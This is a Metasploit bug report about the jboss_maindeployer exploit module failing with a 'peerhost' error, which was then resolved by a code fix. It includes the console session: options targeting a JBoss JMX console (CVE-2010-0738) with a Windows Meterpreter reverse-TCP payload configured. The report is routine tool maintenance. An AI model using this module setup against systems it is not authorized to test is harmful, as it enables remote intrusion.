Bug #2312

jboss_maindeployer - undefined method `peerhost' for [Msf::Module::Platform::Windows]:Array

Added by Amine Psy over 1 year ago. Updated 4 months ago.

Status:Closed Start date:07/30/2010
Priority:Normal Due date:
Assignee:Joshua J. Drake % Done:

100%
Category:modules - exploits
Target version:Metasploit 3.5.0
Resolution:fixed Release Note:

Description

Hello, this is my first post and I hope that this could help improving metasploit.
It is about jboss mail deployer. I am able to exploit this hole and send a payload to the deployer manually, but not using metasploit.

This is the scenario:

msf exploit(jboss_maindeployer) > show options

Module options:

Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   APPBASE                    no        Application base name, (default: random)
   JSP                        no        JSP name to use without .jsp extension (default: random)
   PASSWORD                   no        The password for the specified username
   PATH      /jmx-console     yes       The URI path of the console
   Proxies                    no        Use a proxy chain
   RHOST     192.168.1.9      yes       The target address
   RPORT     80               yes       The target port
   SHELL     automatic        no        The system shell to use
   SRVHOST   192.168.1.100    yes       The local host to listen on.
   SRVPORT   8080             yes       The local port to listen on.
   URIPATH                    no        The URI to use for this exploit (default is random)
   USERNAME                   no        The username to authenticate as
   VERB      POST             yes       The HTTP verb to use (for CVE-2010-0738)
   VHOST                      no        HTTP server virtual host
   WARHOST                    no        The host to request the WAR payload from

Payload options (windows/meterpreter/reverse_tcp):

Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process
   LHOST     192.168.1.100    yes       The listen address
   LPORT     4444             yes       The listen port

Exploit target:

Id  Name
   --  ----
   0   Automatic

msf exploit(jboss_maindeployer) > exploit

[*] Started reverse handler on 192.168.1.100:4444
[*] Attempting to automatically select a target...
[*] Attempting to automatically detect the platform...
[*] Automatically selected target "Windows Universal"
[-] Exploit exception: undefined method `peerhost' for [Msf::Module::Platform::Windows]:Array
[*] Exploit completed, but no session was created.

If you need more informations, just ask me.
Thanks.

Associated revisions

Revision 2f384cde
Added by Joshua Drake over 1 year ago

add alias for calling Msf::Exploit regenerate_payload explicitly -- fixes #2312

git-svn-id: file:///home/svn/framework3/trunk@9950 4d416f70-5f16-0410-b530-b9f4589650da

History

#1
Updated by Joshua J. Drake over 1 year ago

  • Status changed from New to Resolved
  • % Done changed from 0 to 100

Applied in changeset r9950.

#2
Updated by Joshua J. Drake over 1 year ago

  • Target version changed from Metasploit 3.6 to Metasploit 3.5.0
  • Resolution set to fixed

Thanks for the report!

#3
Updated by Jonathan Cran over 1 year ago

  • Status changed from Resolved to Closed

Also available in: Atom PDF